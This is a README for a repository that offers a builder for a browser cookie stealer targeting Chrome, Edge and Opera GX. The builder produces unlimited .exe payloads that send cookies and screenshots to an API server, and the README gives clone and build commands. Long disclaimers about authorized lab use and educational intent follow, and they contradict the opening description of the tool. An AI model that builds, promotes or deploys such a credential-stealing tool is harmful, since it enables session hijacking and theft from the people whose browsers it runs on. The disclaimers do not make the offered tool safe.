This Chrome, Edge, and Opera GX cookie grabber and API server sending software allows you to create an unlimited number of .exe files. It also has various extra features, such as sending screenshots. All of these are theoretically possible. It is created for educational purposes only.
This repository is for controlled, authorized security education and research in isolated environments.
This project must only be used on systems you own or systems where you have explicit written permission from the owner. If you cannot prove authorization, do not use this project.
nodejs-v25.5.0git
mkdir hackmety-windows
git clone https://github.com/hackmety/windows .
npm run build -- --api-url http://localhost:3000
node docs/example-api.js
The intended outcome of this project is to support defensive security learning in controlled labs, including:
- Training on security monitoring and incident response workflows.
- Evaluating how defensive controls react to suspicious endpoint activity patterns.
- Improving auditability, authorization discipline, and research hygiene in red/blue exercises.
This repository is not intended for covert deployment, unauthorized monitoring, or real-world data collection.
Use this project only as part of an approved internal lab process:
- Confirm written authorization and scope before any test.
- Prepare an isolated, disposable test environment (VM/sandbox).
- Use only test accounts and synthetic/non-sensitive data.
- Run controlled experiments and monitor generated telemetry.
- Document findings for defensive improvement, then clean up test artifacts.
Operational misuse instructions are intentionally excluded.
By using this repository, you agree that:
- You are solely responsible for complying with all applicable laws and regulations.
- You will use the project only for legitimate testing, education, and defensive research.
- You will not use the project for unauthorized access, surveillance, data theft, or disruption.
- You accept full responsibility for any misuse.
The maintainers and contributors do not accept liability for unlawful or unethical use.
All of the following conditions must be true before any testing:
- Written authorization exists and is verifiable.
- Testing scope is clearly defined (target, time window, data boundaries).
- Environment is isolated from production and personal systems.
- Only test accounts and non-sensitive data are used.
- Logging and monitoring are enabled for auditability.
The following are strictly prohibited:
- Any use on third-party systems without explicit permission.
- Any attempt to collect real user secrets, credentials, cookies, or personal data.
- Any persistence, evasion, or covert operation outside a controlled lab.
- Any transfer or publication of sensitive data.
- Any activity intended to harm people, organizations, or infrastructure.
Before and during research, apply these controls:
- Run only in disposable lab environments (VM/sandbox).
- Keep outbound network controls in place.
- Use synthetic or anonymized datasets only.
- Maintain immutable logs for every experiment.
- Stop immediately if scope, consent, or safety assumptions change.
This README intentionally avoids providing operational misuse guidance.
If you are conducting legitimate research, create private internal documentation that includes:
- Authorization record and approval chain.
- Test plan and rollback plan.
- Data handling and retention policy.
- Incident reporting flow.
If you discover a real vulnerability during authorized testing:
- Report it to the asset owner privately.
- Include reproducible evidence, impact, and remediation suggestions.
- Do not disclose sensitive details publicly before owner approval.
Do not process personal or production data unless explicitly authorized and legally permitted. Prefer minimal collection, strict retention limits, and secure deletion after testing.
Contributions are welcome only if they improve defensive research quality, transparency, and safety.
By contributing, you confirm that your changes:
- Do not enable unauthorized or harmful use.
- Improve testing integrity, auditing, or safeguards.
- Respect this policy and the repository license.
See LICENSE.
Educational intent does not override legal requirements. Always obtain authorization first.